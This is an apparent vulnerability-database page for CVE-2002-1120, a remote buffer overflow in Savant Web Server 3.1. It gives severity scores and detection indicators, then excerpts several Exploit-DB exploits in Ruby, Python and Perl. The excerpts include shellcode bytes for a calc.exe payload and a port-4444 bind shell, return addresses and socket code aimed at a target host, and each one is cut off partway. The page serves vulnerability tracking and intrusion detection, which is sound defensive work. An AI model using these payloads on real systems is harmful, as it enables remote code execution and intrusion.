CVE-2002-1120
Published 2002-09-24

CVE-2002-1120: Buffer overflow in Savant Web Server 3.1 and earlier allows remote attackers to execute arbitrary code via a long HTTP GET request.

Priority: P3 51 · Severity: high · CVSS 2.0: 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P)
Exploit: available
EPSS: 67.36% (99.2th percentile)
Affected (1 range)
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| savant | savant_web_server | <= 3.1 | — |
Detection & IOCs (extracted from sources)
- bytes: \x83\xc4\x50\x54\xc3
- bytes: \x83\xc4\x8c\x54\xc3
- Detect exploit attempts by inspecting the HTTP method field for long binary/NOP-sled content followed by a space and '/': the exploit places shellcode in the HTTP method before the URI path separator.
- Flag HTTP requests where the method field contains high-entropy binary data or NOP sleds (0x90 sequences); the exploit embeds shellcode in the HTTP method, not the URI.
- The Savant server fingerprint string 'Savant/3.1' in the HTTP Server response header identifies a vulnerable target; monitor for exploit probes against hosts returning this banner.
- Bytes 0x00, 0x0a, 0x0d and 0x25 are bad chars for the payload; exploit traffic will avoid these bytes in the overflow buffer, which can be used to tune IDS signatures.
- Characters in the range 0xe0–0xff placed before the '/' in the HTTP method are modified by Savant; exploit authors use safe NOP alternatives, so look for unusual non-alpha bytes in the HTTP method field.
- Post-exploitation: monitor for unexpected outbound TCP connections or new listeners on port 4444 from the Savant web server process, indicating successful bind-shell payload execution.
- The exploit causes worker threads to die on each attempt; repeated HTTP requests that result in thread exhaustion (up to 10 threads in a default install) against a Savant 3.1 server may indicate an active exploitation attempt.
- The Metasploit module's Universal target RET address (0x00417a96) is a pop/ret gadget inside Savant.exe itself and is version-specific; the other RET addresses target ws2help.dll and are OS/SP-specific.
- Payload space is severely constrained (253 bytes); the Metasploit module recommends 'ord' (ordinal) payloads and uses a -3500 stack adjustment to locate the payload.
No detection rules found.
Exploit-DB · 2010-10-04 · Savant Web Server 3.1 - Remote Overflow (Metasploit) (CVE-2002-1120)
---
```ruby
##
# $Id: savant_31_overflow.rb 10546 2010-10-04 20:53:51Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
include Msf::Exploit::Remote::HttpClient
def initialize(info = {})
super(update_info(info,
'Name' => 'Savant 3.1 Web Server Overflow',
'Description' => %q{
This module exploits a stack buffer overflow in Savant 3.1 Web Server. The service
supports a maximum of 10 threads (for a default install). Each exploit attempt
generally causes a thread to die
```
Exploit-DB · 2009-12-14 · Savant Web Server 3.1 - Remote Buffer Overflow (3) (CVE-2002-1120)
---
```python
#!/usr/bin/python
#Title: Savant web server 3.1 buffer overflow exploit
#Author: DouBle_Zer0
#Version: 3.1
#Tested on: win xp sp2,3 [en]
#Vulnerability discovered by Muts(offensive security)
#\x83\xc4\x50\x54\xc3 -add esp,50 push esp ret[see the double dance of this in exploit]
#ret=00401D09[pop ebp, ret]
import socket,sys
# win calc.exe [metasploit] (172 byte)
host = sys.argv[1]
buff = ("\x31\xc9\x83\xe9\xdb\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\xd8"
"\x22\x72\xe4\x83\xeb\xfc\xe2\xf4\x24\xca\x34\xe4\xd8\x22\xf9\xa1"
"\xe4\xa9\x0e\xe1\xa0\x23\x9d\x6f\x97\x3a\xf9\xbb\xf8\x23\x99\x07"
"\xf6\x6b\xf9\xd0\x53\x23\x9c\xd5\x18\xbb\xde\x60\x18\x56\x75\x25"
"\x12\x2f\x73\x26\x33\xd6\x49\xb0\xfc\x26\x07\x07\x53\x7d\x56\xe5"
"\x33\x44\xf9\
```
Exploit-DB · 2007-08-12 · Savant Web Server 3.1 - GET Universal Remote Overflow (CVE-2002-1120)
---
```perl
#!/usr/bin/perl -w
# exploit for Savant webserver 3.1 remote bof
# shellcode bind 4444 port on target host
#
#
# Jacopo cervini aka [email protected]
#
use IO::Socket;
if(!($ARGV[1]))
{
print "Uso: savant-3.1.pl \n\n";
exit;
}
$victim = IO::Socket::INET->new(Proto=>'tcp',
PeerAddr=>$ARGV[0],
PeerPort=>$ARGV[1])
or die "can't connect on $ARGV[0] sulla porta $ARGV[1]";
#Metasploit shellcode
$shellcode =
"\x31\xc9\x83\xe9\xb0\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\xb5".
"\x55\x45\xd4\x83\xeb\xfc\xe2\xf4\x49\x3f\xae\x99\x5d\xac\xba\x2b".
"\x4a\x35\xce\xb8\x91\x71\xce\x91\x89\xde\x39\xd1\xcd\x54\xaa\x5f".
"\xfa\x4d\xce\x8b\x95\x54\xae\x9d\x3e\x61\xce\xd5\x5b\x64\x85\x4d".
"\x19\xd1\x85\xa0\xb2\x94\x8f\xd9\xb4\x97\xae\x20\x8e\x01\x6
```
Exploit-DB · 2005-08-30 · Savant Web Server 3.1 - Remote Buffer Overflow (2) (CVE-2002-1120)
---
```perl
#!/usr/local/bin/perl
#
# Savant Buffer Overflow Exploit
# ----------------------------------
# Infam0us Gr0up - Securiti Research
#
#
# Tested on Windows2000 SP4 (Win NT)
# Info: infamous.2hell.com
# Vendor URL: http://savant.sourceforge.net
#
$ARGC=@ARGV;
if ($ARGC !=3) {
print "\nUsage: $0 [remote IP] [Port]\n";
print "Example: $0 127.0.0.1 80 1\n";
print "\nsystem:\n";
print " 1 - Windows 2000 SP4\n";
print " 2 - winXP sp1\n";
print "\n";
exit;
}
use Socket;
$x90 = "\x90"x13;
$pack_ret = pack('l', ($ret));
if($sistem==1){$ret = 0x77e14c29;} # Windows 2000 SP4
if($sistem==2){$ret = 0x77fb59cc;} # winXP sp1
my($remote,$port,$iaddr,$paddr,$proto);
$remote=$ARGV[0];
$port =$ARGV[1];
$sistem = $ARGV[2];
print "\n";
print "[+] Con
```
Metasploit · Savant 3.1 Web Server Overflow
This module exploits a stack buffer overflow in Savant 3.1 Web Server. The service supports a maximum of 10 threads (for a default install). Each exploit attempt generally causes a thread to die whether successful or not. Therefore, in a default configuration, you only have 10 chances. Due to the limited space available for the payload in this exploit module, use of the "ord" payloads is recommended.
No writeups or analysis indexed.
References:
- http://archives.neohapsis.com/archives/vulnwatch/2002-q3/0112.html
- http://www.iss.net/security_center/static/10076.php
- http://www.securityfocus.com/bid/5686
- https://www.exploit-db.com/exploits/16770/